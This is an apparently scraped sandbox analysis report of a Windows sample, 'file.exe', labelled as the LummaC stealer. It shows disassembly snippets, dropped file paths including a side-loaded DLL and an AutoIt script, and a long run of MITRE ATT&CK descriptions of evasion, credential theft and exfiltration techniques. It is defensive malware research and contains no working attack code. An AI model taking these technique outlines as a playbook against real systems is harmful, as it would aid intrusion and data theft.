Part of subcall function 00B3FF7F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B41340,?,?,?,00B2100A), ref: 00B3FF84

IsDebuggerPresent.KERNEL32(?,?,?,00B2100A), ref: 00B41344
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B2100A), ref: 00B41353

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B4134E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 6a21b73ff3e99c21ad8bfde6400b3eb322c1c1a3e1384f34e546570a750b5cb0
Instruction ID: d41ff18cb23df24e9d2bc49c4ef5bbfd8e510b154867d13c1065f4afcb0294e8
Opcode Fuzzy Hash: 6a21b73ff3e99c21ad8bfde6400b3eb322c1c1a3e1384f34e546570a750b5cb0
Instruction Fuzzy Hash: 58E06D71A003519FD720AF2CE404746BBE4AB00744F048DACE886C3651EBB4E584CBA1

Function 00BB2C7A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BB2C90
PostMessageW.USER32(00000000), ref: 00BB2C97

Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D

Strings

Shell_TrayWnd, xrefs: 00BB2C89

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c50124438c02175d4a6690fa0a2b96eeff5e34a89620905d0afc3d435719b76b
Instruction ID: 253753febf50b7a763201dbc5ae027fb5c71ff9175fcf1f1054940f3fb2bc588
Opcode Fuzzy Hash: c50124438c02175d4a6690fa0a2b96eeff5e34a89620905d0afc3d435719b76b
Instruction Fuzzy Hash: 74D0C9323C4352ABF664B7709D0BFD76A94AB24B14F1009B57646AA1E0DDE8A800C654

Function 00BB2C46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BB2C50
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BB2C63

Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D

Strings

Shell_TrayWnd, xrefs: 00BB2C49

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0050da98aede59a546f8ef49420c7b74490b2b332978e01f909dd2719c8097de
Instruction ID: 48b857273b77f7407adfa3ef7f74fae5a62cec57d35f280b43f257b291fd9a4c
Opcode Fuzzy Hash: 0050da98aede59a546f8ef49420c7b74490b2b332978e01f909dd2719c8097de
Instruction Fuzzy Hash: E8D0C936388352ABF664B7709D0BFE76A94AB24B14F1009B5764AAA1E0DDE8A800C654

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\bYrIyAT.a3x

C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp

C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NvFrapsOpenVR.man (copy)

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre